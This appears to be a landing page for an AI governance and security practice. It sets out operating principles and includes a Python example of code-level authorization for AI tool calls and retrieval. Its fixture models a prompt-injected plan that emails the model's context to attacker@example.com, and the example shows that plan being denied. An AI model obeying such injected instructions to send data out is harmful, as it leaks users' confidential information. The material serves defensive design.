AI Governance & Security
Operating models and reference architectures for AI-native systems.
AI systems introduce probabilistic decisions, opaque vendor models, automation amplification, and identity questions that traditional security was not designed to handle. This site publishes two practitioner-grade frameworks for governing them.
Operating Principle
AI governance maturity is not defined by zero incidents. It is defined by controlled exposure and predictable response.
Two practice areas.
Pillar 1
Secure-by-Design Operating Model
For: CISO · CRO · Chief AI/Data Officer · GRC
A risk-tiered governance operating model for embedded enterprise AI, covering risk classification, threat modeling, embedded SDLC controls, monitoring, and AI incident response. Aligned to NIST AI RMF, EU AI Act, SOC 2, and ISO 27001.
Pillar 2
AI IAM Reference Architecture
For: Security Architects · Platform Engineers · Cloud Teams
A layered authorization architecture for AI execution chains. It governs users, agents, tools, data, models, and outputs through continuous runtime enforcement. Includes AWS mapping, Cedar policy model, and secure RAG.
Operating Principles
Five ideas the rest of the site is built on.
Principle 1
Risk-proportionate controls
Governance scales with impact, not fear. A marketing recommender does not require the same rigor as a model influencing financial or employment outcomes.
Principle 2
Federated development, central oversight
Product teams retain velocity. A central function provides risk visibility, escalation, and validation for the systems that warrant it.
Principle 3
Embed, don't bolt on
Controls integrate into the AI lifecycle (intake, threat modeling, deployment, monitoring, and incident response). They are not bolted on as compliance overhead.
Principle 4
Guardrails guide, enforcement decides
Model-layer guardrails (system prompts, output filters) shape behavior, but they are advisory: a prompt-injected instruction can talk a model past them. Real authorization must be decided in code at the data, tool, and policy decision layers, before the model ever sees context, so that nothing the model says or plans can grant access it was never given.
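The principle in runnable form, as an added example that is not code from this site or from either framework it describes: a small policy decision point (a stand-in for an external engine such as Cedar; the rule tuples, group names, tools, documents and principals are all constructed for the example) is consulted by a tool dispatcher before any tool executes, and retrieval is filtered by the caller's entitlements before documents become prompt context. The model's output is treated as input to those checks, never as authority.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Principal:
    user: str
    groups: frozenset


@dataclass(frozen=True)
class Document:
    doc_id: str
    text: str
    allowed_groups: frozenset  # constructed per-document ACL


class PolicyDecisionPoint:
    """Minimal stand-in for an external engine such as Cedar: permit-only rules, default deny.

    A rule is a (group, action, resource) triple. A real deployment would hand the same
    (principal, action, resource) question to the engine; the shape of the check is the point.
    """

    def __init__(self, permits):
        self._permits = frozenset(permits)

    def is_authorized(self, principal: Principal, action: str, resource: str) -> bool:
        return any((g, action, resource) in self._permits for g in principal.groups)


class ToolDispatcher:
    """Authorization is decided here, by code, before a tool runs: the model's request is input, not authority."""

    def __init__(self, pdp: PolicyDecisionPoint, tools: dict):
        self.pdp = pdp
        self.tools = tools
        self.audit = []  # (user, tool, decision) records for incident response

    def call(self, principal: Principal, tool_name: str, **args):
        if tool_name not in self.tools:
            raise KeyError(f"unknown tool: {tool_name}")
        permitted = self.pdp.is_authorized(principal, "invoke", f"tool:{tool_name}")
        self.audit.append((principal.user, tool_name, "permit" if permitted else "deny"))
        if not permitted:
            raise PermissionError(f"{principal.user} may not invoke {tool_name}")
        return self.tools[tool_name](**args)


def retrieve(principal: Principal, corpus, query: str):
    """Entitlement filter applied before relevance matching, so unauthorized documents never become candidates."""
    entitled = [d for d in corpus if d.allowed_groups & principal.groups]
    return [d for d in entitled if query.lower() in d.text.lower()]


def build_prompt(principal: Principal, corpus, query: str) -> str:
    context = "\n".join(f"[{d.doc_id}] {d.text}" for d in retrieve(principal, corpus, query))
    # The instruction below is a guardrail: useful, but only text the model may or may not follow.
    # The filtering above is the control: the model cannot reveal a document it never received.
    return f"Answer only from the context below.\nContext:\n{context}\nQuestion: {query}"


def execute_plan(dispatcher: ToolDispatcher, principal: Principal, plan):
    """Run a model-produced tool plan; each step is authorized independently of where the plan came from."""
    outcomes = []
    for step in plan:
        try:
            dispatcher.call(principal, step["tool"], **step.get("args", {}))
            outcomes.append((step["tool"], "ok"))
        except PermissionError:
            outcomes.append((step["tool"], "denied"))
    return outcomes


# --- constructed fixtures for this example ---
CORPUS = [
    Document("hr-1", "Q3 headcount plan: hiring freeze in sales", frozenset({"hr"})),
    Document("pub-1", "Q3 company holiday schedule", frozenset({"everyone"})),
    Document("fin-1", "Q3 revenue forecast revised downward", frozenset({"finance"})),
]
ALICE = Principal("alice", frozenset({"everyone", "hr"}))
BOB = Principal("bob", frozenset({"everyone"}))

PDP = PolicyDecisionPoint({
    ("everyone", "invoke", "tool:lookup_calendar"),
    ("hr", "invoke", "tool:send_email"),
})
TOOLS = {
    "lookup_calendar": lambda **a: "calendar: no conflicts",
    "send_email": lambda **a: f"sent to {a.get('to')}",
}
DISPATCHER = ToolDispatcher(PDP, TOOLS)

# A plan as a model might emit it after a prompt-injected document told it to exfiltrate its context.
INJECTED_PLAN = [
    {"tool": "send_email", "args": {"to": "attacker@example.com", "body": "<context>"}},
    {"tool": "lookup_calendar"},
]

if __name__ == "__main__":
    print([d.doc_id for d in retrieve(ALICE, CORPUS, "Q3")])  # ['hr-1', 'pub-1']
    print([d.doc_id for d in retrieve(BOB, CORPUS, "Q3")])    # ['pub-1']
    print(execute_plan(DISPATCHER, BOB, INJECTED_PLAN))       # [('send_email', 'denied'), ('lookup_calendar', 'ok')]
    print(DISPATCHER.audit)
```

Two design points worth noting. Filtering happens before relevance matching, not after the model answers, so a leaked document is impossible rather than merely discouraged. And the dispatcher consults the policy decision point on every call with the human principal's identity, so a tool step that an injected instruction smuggled into the plan is denied on the same path as a legitimate but unauthorized request, and the audit record distinguishes the two outcomes for responders.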
Principle 5
Controlled exposure, not zero incidents
Maturity is not the absence of failure. It is the presence of predictable response: known taxonomies, tested rollback, and clear escalation paths.